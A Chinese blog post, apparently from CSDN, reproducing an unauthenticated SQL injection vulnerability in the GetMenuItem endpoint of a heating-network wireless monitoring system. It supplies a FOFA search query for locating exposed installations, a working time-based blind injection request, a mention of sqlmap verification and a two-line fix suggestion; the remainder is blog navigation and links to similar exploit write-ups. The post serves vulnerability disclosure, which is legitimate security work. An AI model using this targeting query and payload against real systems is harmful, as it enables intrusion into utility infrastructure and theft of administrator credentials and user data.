热网无线监测系统 GetMenuItem SQL注入漏洞复现

于 2024-09-05 19:17:04 发布
阅读量316 收藏 3
点赞数 16
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45790890/article/details/141938743
版权

1 产品简介


热网无线监测系统是一种先进的热力管网监测解决方案,它通过无线通信技术实现对热力管网各项参数的实时监测和数据分析,以提高供热效率、降低能耗、保障管网安全。系统利用先进的传感器技术和无线通信技术,对热力管网中的温度、压力、流量等关键参数进行实时监测,并将数据传输至监控中心进行集中处理和分析。该系统能够及时发现管网中的异常情况,为供热管理提供决策支持,实现供热系统的智能化、精细化管理。

2 漏洞概述


热网无线监测系统 /DataSrvs/UCCGSrv.asmx/GetMenuItem 接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

3 复现环境

FOFA:

body="Downloads/HDPrintInstall.rar" || body="skins/login/images/btn_login.jpg"

 

4 漏洞复现

PoC

POST /DataSrvs/UCCGSrv.asmx/GetMenuItem HTTP/1.1
Host: 
accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
 
name=1') waitfor delay '0:0:5'-- +

 

sqlmap验证 

 

5 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

 

 

 

 

天官赐福万无禁忌
关注
  • 16
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
泛微E-Office SQL注入漏洞复现
0xSec
11-28 1731
泛微E-Office是一款标准化的协同 OA 办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。
BladeX企业级开发平台 export-user SQL 注入漏洞复现
0xSec
12-19 1815
BladeX企业级开发平台 v3.2.0 及之前版本框架后台 export-user 路径存在安全漏洞,攻击者利用该漏洞可通过组件customSqlSegment 进行SQL注入攻击,攻击者可将用户名、密码等敏感信息通过 excel 导出。
大华 DSS 数字监控系统 itcBulletin SQL 注入漏洞复现
holyxp的博客
12-18 2735
大华 DSs 数字监控系统是大华开发的一款安防视频监控系统,拥有实时监视、云台操作、录像回放、报警处理、设备管理等功能。大华 DSS存在SQL注入漏洞,攻击者 pota/services/itcBuletin 路由发送特殊构造的数据包,利用报错注入获取数据库敏感信息。攻击者除了可以利用 SQL注入漏词获取数据库中的信息例如,管理员后台密码、站点的用户人人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限poc验证是否存在漏洞如果你想查询用户名和密码。
使用DVWA复现SQL注入漏洞(手工+sqlmap)
m0_73818524的博客
06-03 1622
1.2.6安全和合规性:在进行实验时,务必遵守相关的安全和道德规范,不得未经授权对他人系统进行攻击或者侵入,同时保证实验的合规性和合法性通过实验四的完成,可以加深对于SQL注入漏洞的理解和认识,提升对于该类漏洞的识别和防范能力。实验目的回顾:本次实验的目的是通过使用DVWA靶场,手工和自动化工具(sqlmap)复现SQL注入漏洞,以加深对SQL注入漏洞的理解,提升漏洞识别和防范能力。理解SQL注入原理:在进行实验之前,需要理解SQL注入漏洞的原理和攻击方式,包括注入点的定位、SQL语句的构造等。
泛微-云桥e-Bridge SQL注入漏洞复现
0xSec
12-12 1663
由于泛微-云桥e-Bridge平台/taste/addTaste接口处存在SQL注入漏洞,未经身份认证的攻击者可以通过此漏洞获取数据库权限,获取用户密码等重要凭据,使系统处于极不安全状态。
热网无线监测系统 SystemManager.asmx SQL注入漏洞复现
0xSec
07-03 501
热网无线监测系统 SystemManager.asmx 接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
蓝网科技临床浏览系统 deleteStudy SQL注入漏洞复现(CVE-2024-4257)
0xSec
04-29 1095
蓝网科技临床浏览系统 deleteStudy接口处SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
ShowDoc item_id 未授权SQL注入漏洞复现
0xSec
06-05 1314
2024年6月,ShowDoc官方发布新版本修复了一个SQL注入漏洞。鉴于该漏洞无前置条件,易于利用,且默认情况下可暴破用户token获取系统后台权限,建议所有使用该系统的企业尽快升级修复,以确保系统安全
润申信息企业标准化管理系统 多处SQL注入漏洞复现
0xSec
11-30 970
润申信息科技企业标准化管理系统 CommentStandardHandler.ashx、DefaultHandler.ashx接口处存在SQL注入漏洞。攻击者可利用漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
AI安全立法:加州新法案的争议与未来影响
2301_79342058的博客
09-01 897
正如之前详细探讨过的那样,SB-1047法案要求AI模型的创建者在模型出现“对公共安全和安保构成新威胁”时,尤其是在“缺乏人类监督、干预或管理”的情况下,必须实施一种可以“关闭”该模型的“杀手开关”。不要错过这个机会,成为AI领域的领跑者。在周三宣布立法通过时,该法案的发起人、州参议员斯科特·维纳(Scott Weiner)引用了AI行业知名人士的支持,如Geoffrey Hinton和Yoshua Bengio(这两位去年也签署了一份声明,警告快速发展的AI技术可能带来的“灭绝风险”)。
[图解]SysML和EA建模住宅安全系统-活动作为块
rolt的专栏
08-30 1313
然后看它们之间的各种各样的依赖关系
IT服务器安全规范 2024.08
S0linteeH's Blog
08-30 1856
安全配置建议 使用场景 场景说明 安全配置建议 登录密钥 服务器登录账号及密钥。 建议设置为强密码形式:12位以上,同时包含数字、大小写字母、特殊符号 远程登录端口 22、3389端口分别用于服务器的Linux和Windows场景下的远程登录,需对这两端口进行安全限制。 利用安全组限制22、3389远程登录端口的访问来源IP。无法设置白名单时,将远程登录的方式设置为SSH Key认证方式。 MySQL、FTP等在安装的高危服务端口 由于MySQL和
【一嗨租车-注册安全分析报告-滑动验证加载不正常导致安全隐患】
最新发布
09-02 1067
一嗨租车创立于2006年1月,主要为个人和政企用户提供综合汽车出行服务,一嗨租车于北京时间2014年11月18日晚9点45分,正式登陆美国纽交所挂牌交易, 作为美股上市公司,拥有雄厚的技术实力,但采用的是通俗的滑动验证产品,并且不能正常加载导致安全隐患。即使问题解决,其安全性在机器学习的今天, 已经无法应对攻击了,并且正是由于该产品通俗, 所以在网上破解的文章和教学视频也是大量存在,并且经过验证滑动产品很容易被破解, 所以除了滑动验证方式, 花样百出的产品层出不穷,但本质就是牺牲用户体验来提高安全
web渗透:SSRF漏洞
weixin_68416970的博客
09-02 942
SSRF(Server-Side Request Forgery,服务器端请求伪造)是一种安全漏洞,它允许攻击者构造请求,由服务端发起,从而访问服务端无法直接访问的内部或外部资源。为了防范SSRF漏洞,应用程序应该实施严格的输入验证,限制外部请求的来源和类型,以及避免在服务器端执行用户可控的外部请求。内外网web应用攻击:利用SSRF漏洞,攻击者可以针对内外网的web应用发起攻击,特别是那些通过GET参数即可触发的漏洞。通过实施这些措施,可以显著降低SSRF漏洞被利用的风险,保护应用程序和数据的安全
Web3开发与安全:6个月高效学习路径
weixin_47075747的博客
08-30 1751
这份计划应该能帮助你系统地学习智能合约开发和安全审计技能,同时克服英语的障碍。
安全升级:Docker部署Redis,启用密码验证
2302_78886445的博客
08-29 1134
在redis文件夹里面创建:data文件夹和conf文件夹(文件夹名称随意)
DNS部署与安全
m0_64827698的博客
08-28 1598
子域 二级域 顶级域 根域。本地域名服务器(代替主机迭代)去找根域名服务器——>...服务器——>权威服务 客户端。特定服务 公司或组织的名称 公司/国家/...(网站性质或地域)DNS缓存投毒(改映射)、DNS放大攻击(分布拒绝服务DDOS)、子域名劫持。主机找网关(本地域名服务器) 客户端。DNS查询(小数据包,要求速度快),www通常指公司网站的主服务器。
【国铁采购平台-注册安全分析报告-无验证方式导致安全隐患】
08-31 1016
国铁采购平台电子招标采购系统”是中国国家铁路集团有限公司及所属企业指定的电子招标采购系统,运用大数据、云计算、互联网和人工智能技术,提高采购电子化水平,加强采购大数据分析,实现智慧采购和智能管理。,从平台的实力来看应该是非常雄厚,但好像对短信被盗刷的安全方面不够重视 ,测试结果就是随便你怎么攻击都可以,这也有点太开放了, 短信验证码难道不要钱吗?这对黑客来说肯定是好消息, 弄个简单的脚本就可以搞定很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“
eyoucms1.6sql注入漏洞复现
06-09
为了避免漏洞被利用,我不能提供直接的漏洞复现步骤,但我可以告诉您该漏洞的一般性情况和解决方法。 eyoucms 1.6存在多个SQL注入漏洞,攻击者可以利用这些漏洞系统中执行恶意代码,获取系统权限,窃取敏感信息等。 解决这些漏洞的方法包括: 1. 及时升级eyoucms到最新版本,开发者通常会根据安全漏洞修复进行版本升级。 2. 在使用eyoucms时,严格遵循安全规范,例如不要使用默认的管理员账号和密码,不要将敏感信息存储在公共文件夹中,限制文件上传和下载的类型和大小等。 3. 对于已知的SQL注入漏洞,可以通过修改程序代码或使用安全补丁来修复漏洞。 4. 加强服务器的安全性监控和防御能力,例如安装防火墙、入侵检测系统安全审计系统等,及时发现并阻止攻击。 如果您怀疑系统已经受到攻击,请立即停止服务器,并进行全面检查和修复。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值